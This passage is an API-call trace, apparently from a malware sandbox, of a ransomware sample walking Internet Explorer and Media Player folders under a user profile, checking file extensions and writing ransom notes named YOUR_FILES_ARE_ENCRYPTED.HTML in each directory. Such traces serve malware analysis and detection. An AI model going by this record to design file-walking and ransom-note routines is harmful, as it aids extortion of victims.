explorer\\recovery\\active\\recoverystore.{e86c0042-5383-11ec-8920-000e3127764a}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0159.311] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaba19800, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xabe43e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x1200, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="{E86C0043-5383-11EC-8920-000E3127764A}.dat", cAlternateFileName="{E86C0~1.DAT")) returned 1 [0159.311] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{E86C0043-5383-11EC-8920-000E3127764A}.dat") returned 124 [0159.311] lstrcmpW (lpString1="{E86C0043-5383-11EC-8920-000E3127764A}.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.311] PathFindExtensionW (pszPath="{E86C0043-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.311] lstrlenW (lpString=".dat") returned 4 [0159.311] PathFindExtensionW (pszPath="{E86C0043-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.311] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{E86C0043-5383-11EC-8920-000E3127764A}.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\{e86c0043-5383-11ec-8920-000e3127764a}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0159.311] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaba19800, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xabe43e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x60, cFileName="{E86C0043-5383-11EC-8920-000E3127764A}.dat", cAlternateFileName="{E86C0~1.DAT")) returned 0 [0159.311] FindClose (in: hFindFile=0x42f3280 | out: 
hFindFile=0x42f3280) returned 1 [0159.311] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0159.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0159.317] WriteFile (in: hFile=0x5b4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.319] CloseHandle (hObject=0x5b4) returned 1 [0159.319] GetProcessHeap () returned 0x270000 [0159.321] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745a1c8 | out: hHeap=0x270000) returned 1 [0159.321] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName="Active", cAlternateFileName="")) returned 0 [0159.321] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.321] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0159.321] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.321] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.323] CloseHandle (hObject=0x5ac) returned 1 [0159.324] GetProcessHeap () returned 0x270000 [0159.325] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0159.325] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recovery", cAlternateFileName="")) returned 0 [0159.325] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.325] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0159.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.328] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.330] CloseHandle (hObject=0x4a8) returned 1 [0159.330] GetProcessHeap () returned 0x270000 [0159.331] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.336] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0159.336] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player") returned 60 [0159.336] GetProcessHeap () returned 0x270000 [0159.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.338] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player" [0159.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\*" [0159.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.340] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.341] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x46b37180, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x60, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0159.341] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 85 [0159.341] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.341] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0159.341] lstrlenW (lpString=".wmdb") returned 5 [0159.341] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0159.341] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x468fbce0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x468fbce0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x109a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0159.341] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 76 [0159.341] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.341] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0159.341] lstrlenW (lpString=".wmdb") returned 5 [0159.341] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0159.341] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0159.341] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media 
Player\\Sync Playlists") returned 75 [0159.342] GetProcessHeap () returned 0x270000 [0159.342] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x744a1c0 [0159.344] lstrcpyW (in: lpString1=0x744a1c0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0159.344] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*" [0159.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.344] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.345] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0159.345] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 81 [0159.345] GetProcessHeap () returned 0x270000 [0159.345] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x745a1c8 [0159.345] lstrcpyW (in: lpString1=0x745a1c8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0159.345] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*" [0159.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.346] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.346] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="000080A3", cAlternateFileName="")) returned 1 [0159.346] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3") returned 90 [0159.346] GetProcessHeap () returned 0x270000 [0159.346] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x746a1d0 [0159.347] lstrcpyW (in: lpString1=0x746a1d0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3" [0159.347] 
lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\*" [0159.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0159.397] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.397] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0159.397] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\01_Music_auto_rated_at_5_stars.wpl") returned 125 [0159.398] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x0, dwReserved1=0x60, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\02_Music_added_in_the_last_month.wpl") returned 127 [0159.398] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: 
lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\03_Music_rated_at_4_or_5_stars.wpl") returned 125 [0159.398] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.398] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.398] lstrlenW (lpString=".wpl") returned 4 [0159.398] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.398] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd5756410, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x60, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0159.398] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\000080A3\\04_Music_played_in_the_last_month.wpl") returned 128 [0159.398] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", 
